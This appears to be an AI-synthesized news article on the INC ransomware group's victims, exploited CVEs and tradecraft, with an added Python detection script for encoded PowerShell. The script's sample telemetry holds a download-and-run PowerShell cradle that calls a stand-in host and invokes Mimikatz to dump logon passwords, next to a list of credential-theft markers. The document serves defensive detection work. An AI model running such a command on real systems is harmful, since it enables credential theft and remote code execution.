VYPR
Research · Published Jun 17, 2026 · 1 source

INC Ransomware Thrives by Mastering the Basics, Claims Over 800 Victims Since 2023

Acronis analysis reveals INC ransomware has claimed over 800 victims since 2023 by focusing on proven intrusion methods and aggressive victim selection, filling the void left by LockBit and ALPHV/BlackCat.

The INC ransomware group has emerged as one of the most active ransomware-as-a-service (RaaS) operations, claiming more than 800 victims since its debut in 2023. According to a new analysis from the Acronis Threat Research Unit (TRU), the group's success stems not from novel malware or groundbreaking techniques, but from mastering the basics: aggressive victim selection, rapid affiliate scaling, and reliance on proven intrusion methods. INC has particularly benefited from the shutdown of ALPHV/BlackCat and the disruption of LockBit, filling a power vacuum in the ransomware ecosystem alongside other ascendant groups like The Gentlemen.

INC operates as a double extortion ransomware actor, encrypting victim data and threatening to leak stolen information unless a ransom is paid. The group targets a wide range of sectors, including manufacturing, legal services, healthcare, technology, construction, and education. However, it shows a distinct preference for organizations with highly sensitive data, such as healthcare providers, where operational disruption creates immediate pressure to restore systems. High-profile victims include NHS Dumfries & Galloway in Scotland and Alder Hey Children's Hospital in Liverpool, England.

The group's intrusion methods are straightforward but effective: spearphishing, valid account credentials purchased from initial access brokers, and exploitation of well-known vulnerabilities in internet-facing services. Among the CVEs leveraged by INC are CVE-2025-5777 (Citrix Bleed 2, NetScaler ADC/Gateway), CVE-2024-57727 (SimpleHelp RMM), CVE-2023-3519 (Citrix NetScaler ADC/Gateway), and CVE-2023-48788 (Fortinet FortiClient EMS). Once inside a network, INC uses standard discovery tools like Advanced IP Scanner and netscan, steals credentials via base64-encoded scripts, and employs living-off-the-land binaries for lateral movement. Evasion is achieved through EDR killers, and commercial remote access tools serve as command-and-control channels that blend in with legitimate administration.
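The post-intrusion tradecraft above (discovery tools, base64-encoded scripts, encoded PowerShell) is visible in process-creation telemetry, and the decoding step is where most naive rules miss it. The following is an added example written for this page, not code from Acronis or from the INC report: it triages constructed Sysmon-style process-creation events, decodes any `-EncodedCommand` payload the way PowerShell does (UTF-16LE under base64), and looks for credential-theft markers in the decoded script. The tool names, the marker list and the sample events are assumptions for illustration, not indicators published by Acronis.

```python
from __future__ import annotations

import base64
import binascii
import re

# Lower-cased image basenames for the discovery tools the article names (assumed set).
DISCOVERY_TOOLS = {"advanced_ip_scanner.exe", "advanced_ip_scanner_console.exe", "netscan.exe"}

# Substrings that indicate credential theft once a script is decoded. Illustrative list
# assumed for this example; extend it from your own threat intel.
CRED_THEFT_MARKERS = ("sekurlsa", "lsass", "mimikatz", "ntds.dit", "reg save hklm\\sam", "comsvcs.dll")

# PowerShell accepts -e, -ec, -enc and -EncodedCommand followed by base64 of a UTF-16LE script.
# The trailing whitespace requirement keeps -ExecutionPolicy from matching as "-e".
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the decoded -EncodedCommand payload, or None if none is present or decodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")  # non-standard encoders still yield something to inspect


def triage_event(event: dict) -> list[str]:
    """Return the reasons an event matches the tradecraft above (empty list = nothing matched)."""
    reasons = []
    image = event["image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if image in DISCOVERY_TOOLS:
        reasons.append(f"discovery tool executed: {image}")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        reasons.append("base64-encoded PowerShell command")
        hits = [marker for marker in CRED_THEFT_MARKERS if marker in decoded.lower()]
        if hits:
            reasons.append("credential theft markers in decoded script: " + ", ".join(hits))
    return reasons


def scan(events: list[dict]) -> dict[str, list[str]]:
    """Map record id -> reasons for every event that matched at least one rule."""
    return {e["id"]: r for e in events if (r := triage_event(e))}


def _enc(script: str) -> str:
    # Encode a script exactly as PowerShell's -EncodedCommand expects (UTF-16LE, then base64).
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (Sysmon Event ID 1 style); not data from the Acronis report.
SAMPLE_EVENTS = [
    {"id": "e1", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"id": "e2", "image": r"C:\Users\admin\Downloads\Advanced_IP_Scanner.exe",
     "cmdline": "Advanced_IP_Scanner.exe /portable"},
    {"id": "e3", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/m.ps1'); "
         "Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'")},
    {"id": "e4", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"id": "e5", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + _enc("Get-Date")},
    {"id": "e6", "image": r"C:\Tools\netscan.exe", "cmdline": "netscan.exe /range:10.0.0.1-10.0.0.254"},
]

if __name__ == "__main__":
    for record_id, reasons in scan(SAMPLE_EVENTS).items():
        print(record_id, "->", "; ".join(reasons))
```

Two design points matter in practice. Decoding before matching is what separates e3 (an encoded credential dumper) from e5 (an encoded but harmless `Get-Date`): both are worth logging as encoded commands, but only the former warrants an incident. And the regex deliberately demands whitespace after the flag so the common `-ExecutionPolicy Bypass` pattern in e4 does not trip the encoded-command rule; false positives on that string are a frequent source of alert fatigue.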

INC's malware comes in two versions—Windows and Linux/ESXi—both recently rewritten in Rust, a language that makes reverse engineering more difficult and simplifies cross-platform development. While the malware's capabilities (process killing, encryption, credential theft) are not novel, they are functional. The quality of the code is evidenced by its sale to at least three other threat actors in 2024, including the Lynx and Sinobi ransomware groups, which are believed to use strains of INC's malware.

Santiago Pontiroli, threat intelligence research lead at Acronis, told Dark Reading that INC's growth can be attributed to three factors: unusually aggressive victim selection, rapid affiliate scaling, and a focus on proven intrusion methods that maximize volume rather than technical innovation. "What makes INC particularly effective is its focus on sectors where disruption creates immediate pressure to restore operations," he said. "These types of organizations often hold sensitive data and face significant operational consequences when systems are disrupted, creating strong leverage for extortion."

INC's rise has been reflected in victim count rankings. According to Adam Darrah, VP of intelligence at ZeroFox, INC broke into the global top five for the first time in Q1 2026 with 124 incidents, behind Qilin (338), Akira (197), and The Gentlemen (192) but ahead of Cl0p. Darrah noted that INC's trajectory has been uneven, with a contraction in late 2025 followed by a Q1 2026 surge, which likely reflects affiliate churn and re-consolidation rather than sustained organic growth. Nonetheless, its Q1 numbers suggest it is attracting affiliate volume at a competitive rate.

Acronis's blog post includes YARA rules and indicators of compromise to help defenders detect INC activity. The researchers recommend organizations adopt a 3-2-1 backup rule (three copies of data on two different media types, with one copy stored offsite), ensure backups are offline or immutable and regularly tested, use endpoint and ransomware protection tools, implement identity and access controls, stay patched, and segment networks. "Because these affiliates continue to rely on opportunistic tactics such as stolen credentials, phishing, credential reuse and exploitation of unpatched remote services, organizations should prioritize reducing external exposure and securing perimeter access points to limit the risk of intrusion," the blog post stated.

INC's success underscores a broader trend in the ransomware landscape: groups that execute basic tactics consistently can achieve significant impact, even without sophisticated malware. As Pontiroli noted, "INC has shown that a ransomware operation doesn't need novel malware to be effective. Consistently turning common intrusion techniques into a steady stream of victims across high-pressure sectors can be just as powerful."

Synthesized by Vypr AI